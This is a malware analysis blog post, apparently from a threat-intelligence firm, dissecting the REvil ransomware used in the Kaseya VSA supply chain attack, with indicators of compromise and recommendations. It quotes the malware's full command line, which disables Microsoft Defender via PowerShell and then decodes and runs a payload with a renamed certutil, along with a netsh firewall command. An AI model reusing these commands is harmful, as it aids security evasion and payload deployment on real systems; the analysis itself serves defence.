Dissection of REvil Ransomware: Kaseya VSA Supply Chain Attack

Watch the video where we analyze the Kaseya VSA supply chain attack and dissect the REvil ransomware through Sandbox Execution.

Update on July 5, 2021: 

The REvil Ransomware group posted a message on their leak site in the darkweb, claiming that they have compromised Kaseya, an MSP provider, on July 02, 2021. The Ransomware group also claims that there have been a million systems impacted by the ransomware at present. The group is demanding a 70Million USD in BTC for publicly publishing the decryptor for all victims. 

Figure 1: REvil’s post 

Kaseya, a complete IT solution management company, released a public media notice stating that their product VSA, dealing with remote monitoring & management, is under attack.   

The public notice released on July 2, 2021, at 10:00 PM EST states:    

  1. “All on-premises VSA servers should continue to remain down until further instructions from Kaseya about when it is safe to restore operations. A patch will be required to be installed prior to restarting the VSA.”    
  1. “SaaS & hosted VSA servers will become operational once Kaseya has determined that we can safely restore operations.”    

According to researchers, a massive supply chain attack executed by the REvil ransomware targeting “Kaseya VSA” has impacted several Managed Service Providers (MSP) and their clients. The ransomware was delivered after an apparent auto-update in the product. Kaseya’s remote IT management software administers systems with high privilege, which allows easy ransomware propagation across the client’s system.     

The attack chain of the Kaseya VSA Ransomware attack is depicted in the following diagram.  

Figure 2: Attack chain of Kaseya VSA Ransomware attack 

Kaseya VSA is an automated software patch management and vulnerability management system. The ransomware group makes use of software updates through the Kaseya VSA agent hotfix and delivers the REvil encryptor payload to clients. The hotfix file called “agent.exe” has embedded malicious DLL file which is side-loaded into legitimate Microsoft Defender using defender executable named “MsMpEng.exe“. 

The REvil (Ransomware Evil), also known as Sodinokibi, was formed in 2019 and operates as ransomware-as-a-service, i.e., it provides prebuild ransomware tools to its affiliates for executing attacks. The ransomware was first used by the GOLD SOUTHFIELD threat group. REvil is one of the most sophisticated Ransomware groups and is behind several significant attacks. Figure 3 shows the ransom note used by REvil.     

  Figure 3: Ransom note  

Technical Analysis 

The Cyble research team was able to discover recent REvil ransomware sample with SHA256:D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E. 

It was found that the main REvil sample is a dropper, and VC compiled binary with malicious resources named ”SOFTIS” and “MODLIS”.   

As shown in Figure 4, it loads resources during runtime; the resource files are REvil payload “mpsvc.dll” and the loader “MsMpEng.exe“.   

  Figure 4: Dropper file  

  Upon execution, the dropper creates REvil payload files and the loader file in the following system directory.   

  C:\Windows\mpsvc.dll (which is sideloaded in legit Microsoft Defender) 

  C:\Windows\MsMpEng.exe (legit Loader files) 

  Figure 5 below shows dropped payloads on the victim’s machine and their execution.  

  Figure 5: Payload files    

The dropper file and Ransomware payload have valid certificates and use the same certifier named PB03 TRANSPORT LTD, as depicted in the image below.  

Figure 6 Certificate Information 

The REvil ransomware payload has an embedded RC4 encrypted configuration file, and it is decrypted during the runtime, as shown in Figure 7. 

Figure 7 Decrypted Configuration File of REvil 

The REvil ransomware configuration is stored in JSON format with the configuration parameters shown below.  

Keys Description 
et Encryption type 
wipe Erase directories 
ext Targeted file extension 
dbg Debugging flag 
fld Backup program directories 
wfld Whitelisted directories 
prc List of processes to terminate 
dmn C2 domains 
svc Services to be disabled 
net Encryption of network shared drives 
exp Exploiting privilege escalation 
nname File name of ransom notes (readme.txt) 
nbody Ransomware notes in Base64 

The image below highlights the configuration file with C2 domains, Base64 decoded ransom note, and services stopped by the payload.  

Figure 8 Configuration File in JSON Format 

The command, netsh advfirewall firewall set rule group=”network discovery” new enable=yes, is used by REvil to change the firewall settings to allow local computers to be discovered on their network.   

Figure 9 Enabling Network Discovery 

This is followed by the creation of a registry key to store encryption keys of the attacker and the victim in addition to a generated unique file extension. 

The registry key created in this case is: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter  

Figure 10 Registry key added by REvil 

As shown below, the payload starts folder enumeration and loads the targeted file into the memory for encryption. 

Figure 11 File System Enumeration 

The payload then encrypts the plain text content and writes back the encrypted content in the file. The debugger image below showcases the encrypted file content. After encryption, the files are appended with a unique extension generated by the ransomware. 

Figure 12 Encrypting Plain Text Content and Writing the Encrypted Content in the File  

Finally, the ransomware locks the victim’s screen and displays the ransom note. Figure 13 shows the locks screen with encrypted files. The ransomware does not require an active internet connection for performing encryption and generates a unique key for every infected system.    

  Figure 13: Lock screen with Encrypted files  

Moreover, REvil has functionalities to disable Microsoft Defender services, such as DisableRealtimeMonitoringDisableIntrusionPreventionSystemDisableIOAVProtection, and DisableScriptScanning. The payload tries to execute a PowerShell command to disrupt the Microsoft Defender services, as shown below. 

“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 

   The ransom note consists of a link, which can only be accessed using the keys present in the ransom note. The link belongs to the REvil (Sodinokibi), and it has information related to the ransom amount, the decryptor, and a timer.  

  Figure 14 showcases the website of the ransomware group present in the ransom note.   

  Figure 14: REvil’s Ransomware group website    

Figure 15 shows the attack heat map for the REvil ransomware group. As of July 8, 2021, there have been 140 victims of the REvil ransomware.    

  Figure 15: REvil’s Attack Heat Map  

Figure 16 depicts the industry-wise attack distribution of the REvil ransomware victims observed by the Cyble Research team.   

Figure 16: REvil’s Industry-wise Attack Distribution.  

REvil is one of the most active ransomware groups, targeting multiple victims on a regular basis. As per our research, the activities of the REvil ransomware group may be targeted towards a massive supply chain attack.  

Cyber espionage activities are evolving quickly, and we have seen supply chain attacks in the past as well, which have impacted large organizations. Attackers will continue to find new attack vectors to remain evasive, so it becomes essential for organizations to harden their security.     

Our Recommendations   

  • Use the shared IoCs to monitor and block the malware infection.  
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Conduct regular & timely patching of vulnerabilities on your infrastructure. 
  • Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity. 
  • Conduct regular backup practices and keep those backups offline or in a separate network.   

Indicators of Compromise (IoCs):     

Indicators  Indicator type  Description  
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd   SHA-256  mpsvc.dll  
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2   SHA-256  DLL file  
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e   SHA-256  sample.exe  
9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1  SHA-256  file.exe  
hxxp[:]//aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion  URL  Tor link   

About Cyble: 

Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups to Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com

Leave a Comment

Your email address will not be published.

%d bloggers like this: